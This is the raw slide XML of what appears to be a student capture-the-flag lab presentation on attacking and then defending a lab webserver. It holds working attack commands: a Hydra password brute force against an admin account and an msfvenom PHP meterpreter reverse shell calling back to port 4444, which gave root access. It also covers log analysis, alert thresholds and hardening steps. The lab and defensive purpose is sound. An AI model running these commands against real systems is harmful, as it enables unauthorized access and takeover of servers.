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Black"/>
      <p:bold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03628A-8EBA-42F4-8165-B5216F7BB21C}">
  <a:tblStyle styleId="{B703628A-8EBA-42F4-8165-B5216F7BB21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RobotoLigh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Black-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold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6" name="Google Shape;11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2" name="Google Shape;12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0" name="Google Shape;123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7" name="Google Shape;1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5" name="Google Shape;124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3" name="Google Shape;125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1" name="Google Shape;126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9" name="Google Shape;126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7" name="Google Shape;127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4" name="Google Shape;10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0" name="Google Shape;11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19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27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27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7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2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2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2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1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4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1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1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192.168.1.105/company_folders/secret_folder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nvd.nist.gov/vuln/detail/CVE-2019-13386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by</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1" lang="en" sz="1800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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Ben Nwamaghinna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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="-22860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[Reverse shell Backdoor]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137" name="Google Shape;1137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38" name="Google Shape;1138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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457182" y="1480624"/>
            <a:ext cx="2695592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oto Sans Symbols"/>
              <a:buChar char="▪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Used Msfvenom to create a reverse shell that was deployed to the target machine:  msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php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Then remote listener was activated on the attacking machine (Kali). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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reverse shell was executed on the target machine – the webserver.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0" name="Google Shape;1140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3" name="Google Shape;1143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reverse shell execution gave root access to the server and the flag.txt document was accessed.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8" name="Google Shape;1148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9" name="Google Shape;114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0" name="Google Shape;115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1" name="Google Shape;1151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phical user interface, text&#10;&#10;Description automatically generated" id="1153" name="Google Shape;115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747" y="1390589"/>
            <a:ext cx="2936045" cy="3343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0" name="Google Shape;1160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6" name="Google Shape;1166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67" name="Google Shape;116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68" name="Google Shape;1168;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1478558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9" name="Google Shape;1169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70" name="Google Shape;117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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1533125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2" name="Google Shape;11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586" y="1475828"/>
            <a:ext cx="8596064" cy="3383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8" name="Google Shape;1178;p66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What time did the port scan occur?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="1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 port scan occurred on October 28@19:38:20:001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-91440" lvl="1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1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How many packets were sent, and from which IP?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="1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Packets sent from 192.168.1.90 were 13,943</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1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What indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="1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There were multiple ports used at the same time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1179" name="Google Shape;117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 - ANSWERS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5" name="Google Shape;1185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86" name="Google Shape;1186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7" name="Google Shape;1187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8" name="Google Shape;1188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89" name="Google Shape;118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0700" y="1325526"/>
            <a:ext cx="3351725" cy="328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914" y="1420926"/>
            <a:ext cx="5306786" cy="318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97" name="Google Shape;1197;p6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What time did the request occur?   The request occurred (started) at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>:37:26:731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 How many requests were made? 13,074 requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-914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914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Which files were requested? What did they contain? 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It was rather a folders – /company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr/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 in this folder was a link to where the files were (connect_to_corp_server) that has instruction for connecting to webdav</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="609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198" name="Google Shape;1198;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168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ANSWERS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4" name="Google Shape;1204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05" name="Google Shape;1205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6" name="Google Shape;1206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7" name="Google Shape;1207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208" name="Google Shape;120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747" y="1405266"/>
            <a:ext cx="8776650" cy="3585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5" name="Google Shape;1215;p70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16" name="Google Shape;1216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17" name="Google Shape;1217;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1439225"/>
            <a:ext cx="8409300" cy="23841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8" name="Google Shape;1218;p70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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>  62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   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>Shell.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1219" name="Google Shape;121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594" y="1457340"/>
            <a:ext cx="8977706" cy="3459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6" name="Google Shape;1226;p71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How many requests were made to this directory? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>  62 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> were made directly to the folder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http://192.168.1.105/webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-914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914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4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/>
              <a:t>Which files were requested?    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Shell.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="1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/>
              <a:t>http://192.168.1.105/webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>/shell.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-91440" lvl="1" marL="7772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1227" name="Google Shape;1227;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="0"/>
            <a:ext cx="9169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 - ANSWERS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Google Shape;123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72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4" name="Google Shape;1234;p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40" name="Google Shape;1240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1" name="Google Shape;1241;p73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Alert that monitors the number of ports accessed from the same IP address per second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The threshold would be to Alert email and log when port scan exceeds  500 from the same IP address at a particular timestamp - all directed to port 443 or 80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42" name="Google Shape;1242;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44668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I will use of IP tables/firewall port blocking and scan delays to protect from numerous port scans.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The use of IPS and IDS will help for rapid response as it will detect the intrution and/or prevent it.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/>
              <a:t>Iptables –A INPUT –p tcp –m tcp –m multiport! –dports 80,443 –j DROP</a:t>
            </a:r>
            <a:endParaRPr i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48" name="Google Shape;1248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9" name="Google Shape;1249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I would set Alert to email or log when ever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https://192.168.1.105/company_folders/secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> is accessed by any IP address other than 192.168.1.105 or 192.168.1.1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search:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>source. Ip:  (not 192.168.1.105 or 192.168.1.1) and url.path: *secret_folder*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is http.request &gt;= 1 from any ip except 192.168.1.105 and 192.168.1.1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50" name="Google Shape;1250;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466799" y="1604700"/>
            <a:ext cx="4624949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The</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> configuration file on the webserver (host) should configured to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" sz="1600"/>
              <a:t>deny any IP addresses from anywhere.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allow the following whitelisted Ips</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a: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          192.168.1.105, 	127.0.0.1, 192.168.1.1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The directory listings in Apache should be  disabled by removing the indexes.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56" name="Google Shape;1256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7" name="Google Shape;1257;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1457325"/>
            <a:ext cx="4298400" cy="3446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1400"/>
              <a:t>HTTP error code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>401 (unauthorized client error) indicates that request has not been completed because it lacks valid authentication credentials for the requested resource.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Alert email and log when protected files and folders are requested from unknown IP addresses or when 401 error codes returned are above 10 in less than a minute</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Google Shape;1258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Strong password policy to include alphanumeric and symbols, and the password length should not be less that 10 characters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Account Lockout should be activated after 5 wrong password attempts.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Multifactor authentication should be implemented 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 will blacklist all IP addresses with wrong login attempts above 20 in a day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64" name="Google Shape;1264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65" name="Google Shape;1265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Any request made from any IP other than 192.168.1.105 and 192.168.1.1 should be alerted.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400"/>
              <a:t>The threshold to activate this should be requests &gt;=1.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466799" y="1604700"/>
            <a:ext cx="4598823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The httpd/conf/ configuration file on the webserver (host) should configured to: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deny any IP addresses from anywhere.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1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 the following whitelisted IPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a: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          192.168.1.105, 	127.0.0.1, 192.168.1.1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The directory listings in Apache should be  disabled by removing the indexes.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Patching with security updates should be done.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Vulnerability management tool like AVSD can be used. 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72" name="Google Shape;1272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73" name="Google Shape;1273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An alarm will be set to alert of any traffic accessing the outbound port of 4444. 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Setting alert for any file uploaded or copied to the webdav directory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threshold should be set  request &gt;=1 meaning any attempt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74" name="Google Shape;1274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Blacklist all unknown or untrusted IP addresses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Change the folder permission to read only </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-1968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400"/>
              <a:t>Make sure that unused ports are closed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																																																																																																																																																																																																														</a:t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ML-RefVm-684427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300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446" y="910475"/>
            <a:ext cx="5932843" cy="3833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18823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398700" y="10687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{B703628A-8EBA-42F4-8165-B5216F7BB21C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2001925"/>
                <a:gridCol w="3257550"/>
                <a:gridCol w="3087125"/>
              </a:tblGrid>
              <a:tr h="404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Address/Ports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 /OS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91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192.168.1.105       </a:t>
                      </a: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Ports: 80/tcp  open http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      22/tcp open  ssh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This is a Web Server that host the company folders and the secret folder that was requested during the attack.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uses Linux operating system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3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System ML-RefVm-684427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         </a:t>
                      </a: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Ports:     135/tcp open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       139/tcp open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        445/tcp open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               2179/tcp open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3389/tcp open mis-wpt-server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SIEM machine is the cloud-based host machine that serves as the jump box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runs Windows operating system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4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Penetration testing system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          </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b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Ports</a:t>
                      </a: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:  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b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22/tcp open ssh</a:t>
                      </a:r>
                      <a:endParaRPr b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is the attacking machine that was used in the process.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 runs Linux operating system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7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 ELK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      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b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Ports:  22/tcp  open ssh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                       9200/tcp open wap-wsp</a:t>
                      </a:r>
                      <a:endParaRPr b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NAT Switch is the network monitoring machine that runs Kibana where all logs are processed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runs Linux operating system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{B703628A-8EBA-42F4-8165-B5216F7BB21C}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Indexing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CWE-548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0"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allows the hacker to view and download contents of a directory on the vulnerable machine.  CWE is all about information leak through directory listing.</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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 access to confindential information on the victim machine to be compromised.  Hacker can also gain root access to the machine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example: LFI Vulnerability </a:t>
                      </a:r>
                      <a:endParaRPr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 and No account lockout from failed attempts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password was accessed by brute forcing with rockyou dictionary.  This was done using hydra brute force tool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Theis brute force provided access to the secret folder. Admin password was retrieved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Backdoor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 2019 - 13386</a:t>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1400" u="sng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  <a:hlinkClick r:id="rId3">
                          <a:extLst>
                            <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                              <ahyp:hlinkClr val="tx"/>
                            </a:ext>
                          </a:extLst>
                        </a:hlinkClick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payload was deployed to the target machine without hindrance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shell payload provided steady backdoor access to the webserver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[Directory Listing]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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781275" y="1480575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 was initially used to find the IP addresses of the machines in the network. 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Navigated straight to the website with the ip address 192.168.1.105 on a web browser and the listings of directory was effected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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502996" y="1421383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Had access to the files in the folders.  Found out the ranks of three key personnels of the company.  Ryan is the CEO, Ashton is the Admin and Hannah a Tech expert.  This helped to further the attack</a:t>
            </a:r>
            <a:endParaRPr/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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134081" y="1481374"/>
            <a:ext cx="2638594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Graphical user interface, text, application&#10;&#10;Description automatically generated" id="1106" name="Google Shape;110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8913" y="1410237"/>
            <a:ext cx="2168930" cy="1554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1107" name="Google Shape;110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1432" y="3147842"/>
            <a:ext cx="2188687" cy="1456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[]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113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4" name="Google Shape;1114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Hydra was used to brute force for the password of Ashton -the Admin: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hydra -l Ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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Crackstation.net was also used to unhash the hashed password of Ryan the CEO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6" name="Google Shape;1116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7" name="Google Shape;1117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8" name="Google Shape;1118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9" name="Google Shape;1119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20" name="Google Shape;1120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1" name="Google Shape;1121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2" name="Google Shape;1122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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385153" y="1115600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the use of rockyou dictionary Ashton’s password was retrieved and the /secret_folder/ was accessed.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Ryan’s password was retrieved, and this allowed access to webdav information.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4" name="Google Shape;1124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7" name="Google Shape;1127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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6370145" y="887854"/>
            <a:ext cx="2627118" cy="384577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computer screen capture&#10;&#10;Description automatically generated with medium confidence" id="1129" name="Google Shape;112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758" y="1321181"/>
            <a:ext cx="2638448" cy="1265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130" name="Google Shape;113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757" y="2620230"/>
            <a:ext cx="2627536" cy="1347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website&#10;&#10;Description automatically generated" id="1131" name="Google Shape;113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1175" y="3927659"/>
            <a:ext cx="2675740" cy="966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